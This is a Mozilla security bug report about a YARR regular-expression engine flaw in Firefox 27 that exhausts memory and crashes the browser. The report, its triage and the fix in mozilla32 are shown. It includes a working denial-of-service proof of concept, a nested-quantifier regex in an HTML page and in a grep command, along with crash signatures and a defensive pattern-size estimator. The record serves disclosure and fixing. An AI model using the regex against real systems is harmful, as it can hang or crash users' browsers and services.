YARR regexp Memory exhaustion and crash

VERIFIED FIXED in mozilla32

Status

Core
JavaScript Engine
VERIFIED FIXED
3 years ago
3 years ago

People

(Reporter: Max, Unassigned)

Tracking

({crash, csectype-dos, sec-low})

27 Branch
mozilla32
crash, csectype-dos, sec-low
Points:
---

Firefox Tracking Flags

(firefox-esr31 wontfix)

Details

(crash signature)

(Reporter)

Description

3 years ago
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36

Steps to reproduce:

http://cert.cx/regexp-smaczki/regex.html

---
<HTML>
<HEAD>
<TITLE>Firefox 27.0.1 and Safari 7.0.2 (9537.74.9)</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF">
<SCRIPT type="text/javascript">
var patt1=new RegExp("((.*)(((((((((((((((((((((((((((((((.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+))");
document.write(patt1.exec("cxsecurity"));
</SCRIPT>
</BODY>
</HTML>
---


Actual results:

memory exhaustion and crash

Observed memory exhaustion in Safari and Firefox under MacOSX.
Under Windows, Firefox allocated 3.8GB

http://cert.cx/regexp-smaczki/regcomp1.png

and crashed

http://cert.cx/regexp-smaczki/regcomp3.png
(Reporter)

Updated

3 years ago
Hardware: x86 → x86_64
Summary: regexp → Firefox 27.0.1 regexp Memory exhaustion and crash
Component: Untriaged → JavaScript Engine
Product: Firefox → Core
(Reporter)

Comment 1

3 years ago
http://cert.cx/regexp-smaczki/regcomp1.png

Crash here

http://cert.cx/regexp-smaczki/visual4.png


Memory exhaustion
http://cert.cx/regexp-smaczki/visual3.png
http://cert.cx/regexp-smaczki/visual2.png
http://cert.cx/regexp-smaczki/visual1.png
What is the ID of the crash report you get?  It will be listed in about:crashes.
The sample made my browser hang and eventually, it used up all of the memory on my system, but no crash. Good DoS though.
(Reporter)

Comment 4

3 years ago
Crash only under Windows and only if more than 4GB is free.

Another PoC for MacOSX 10.9.2

000000000000000:kozak6 cx$ ls |grep -E '((.*)(((((((((((((((((((((((((((((((.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+))'
grep(715,0x7fff746ed310) malloc: *** mach_vm_map(size=18446744071973109760) failed (error code=3)
*** error: can't allocate region
*** set a breakpoint in malloc_error_break to debug
grep: out of memory
On x64 Nightly Windows it consumes enough memory to quickly DOS the operating system. On 32-bit Firefox Nightly I crashed at

[@ mozilla::VectorBase<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy, js::Vector<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy> >::reserve(unsigned int) ] 
https://crash-stats.mozilla.com/report/index/8e2997ff-71ea-489f-a427-e387d2140316

[@ JSC::Yarr::YarrPatternConstructor::copyDisjunction(JSC::Yarr::PatternDisjunction*, bool) ]
https://crash-stats.mozilla.com/report/index/d3c0593b-13ab-4ee6-ba52-dac7d2140316
https://crash-stats.mozilla.com/report/index/9bd828e0-b6c5-45b6-8b89-648f42140316

[@ JSObject::getType(JSContext*) ]
https://crash-stats.mozilla.com/report/index/e33ef987-f160-4b46-8030-0ff062140316
https://crash-stats.mozilla.com/report/index/04b8743d-b489-4931-9eb4-00ec22140316
Status: UNCONFIRMED → NEW
Crash Signature: [@ mozilla::VectorBase<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy, js::Vector<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy> >::reserve(unsigned int) ]
Ever confirmed: true
OS: Mac OS X → All
Hardware: x86_64 → All
Group: core-security
Keywords: csectype-dos, sec-low
Summary: Firefox 27.0.1 regexp Memory exhaustion and crash → YARR regexp Memory exhaustion and crash
Crash Signature: [@ mozilla::VectorBase<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy, js::Vector<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy> >::reserve(unsigned int) ] → [@ mozilla::VectorBase<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy, js::Vector<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy> >::reserve(unsigned int) ] [@ JSC::Yarr::YarrPatternConstructor::copyDisjunction(JSC::Yarr::PatternDisjunctio…
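The crash signatures above sit in pattern construction (YarrPatternConstructor::copyDisjunction and the PatternTerm vector reserve), so the memory is consumed while the pattern is expanded, before any input is matched. As an added example (not code from this bug or from Mozilla), the following JavaScript estimates how far a pattern expands when `{n}` repeats of a group are unrolled and a group under `+` is duplicated, and refuses patterns over a budget before they reach `new RegExp`; the cost model (`{n}` → n copies, `{n,m}` → n+1, `+` → 2) is an assumption of this example, not YARR's exact algorithm.

```javascript
// Added example: estimate the unrolled size of a regex pattern so that a
// nested (...)+ / (.*){10} shape like the PoC above can be refused up front.
// The cost model is an approximation chosen for this example, not YARR's own.
function estimateRegexExpansion(pattern, budget = 1e6) {
  const stack = [0];            // term count of each open group, innermost last
  let i = 0;
  const repeatFactor = () => {  // multiplier implied by the quantifier at pattern[i]
    const c = pattern[i];
    if (c === '+') { i++; return 2; }              // one fixed copy + one open-ended copy
    if (c === '*' || c === '?') { i++; return 1; } // no unrolling assumed
    if (c === '{') {
      const m = /^\{(\d+)(,(\d*))?\}/.exec(pattern.slice(i));
      if (m) {
        i += m[0].length;
        const min = Number(m[1]);
        return m[2] === undefined ? min : min + 1; // {n}: n copies; {n,}/{n,m}: n + tail
      }
    }
    return 1;
  };
  while (i < pattern.length) {
    const c = pattern[i++];
    let terms;
    if (c === '\\') { i++; terms = 1; }            // escaped character is one term
    else if (c === '[') {                          // character class is one term
      while (i < pattern.length && pattern[i] !== ']') i += pattern[i] === '\\' ? 2 : 1;
      i++; terms = 1;
    }
    else if (c === '(') {                          // open a group; skip (?: (?= (?! prefixes
      stack.push(0); if (pattern[i] === '?') i += 2; continue;
    }
    else if (c === ')') {                          // close group: its terms plus the group itself
      if (stack.length < 2) throw new SyntaxError('unbalanced ")"');
      terms = stack.pop() + 1;
    }
    else if (c === '|') continue;                  // alternatives simply add up
    else terms = 1;
    terms *= repeatFactor();
    stack[stack.length - 1] += terms;
    if (stack[stack.length - 1] > budget) return { ok: false, terms: stack[stack.length - 1] };
  }
  if (stack.length !== 1) throw new SyntaxError('unbalanced "("');
  return { ok: true, terms: stack[0] };
}

function safeRegExp(pattern, flags, budget) {   // refuse oversized patterns before compiling
  const est = estimateRegexExpansion(pattern, budget);
  if (!est.ok) throw new RangeError(`pattern expands to >${est.terms} terms`);
  return new RegExp(pattern, flags);
}
```

Feeding the PoC regex from the description into `estimateRegexExpansion` returns `ok: false` immediately, whereas ordinary patterns stay in the tens of terms.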
Max: is this regexp memory exhaustion and crash still an issue in Firefox's Nightly channel? We replaced YARR with irregexp in Nightly 32 (bug 976446).
Depends on: 976446
Flags: needinfo?(max)
Keywords: crash
(Reporter)

Comment 8

3 years ago
I confirm that the bad memory allocation and crash are eliminated. irregexp is a good choice.
Flags: needinfo?(max)
Assuming fixed by bug 976446.
Status: NEW → RESOLVED
Last Resolved: 3 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla32
There is only one Yarr related crash in the last 3 days in the 32 or 33 channels, and it's for a 20140509030227 build.
Status: RESOLVED → VERIFIED
status-firefox-esr31: --- → wontfix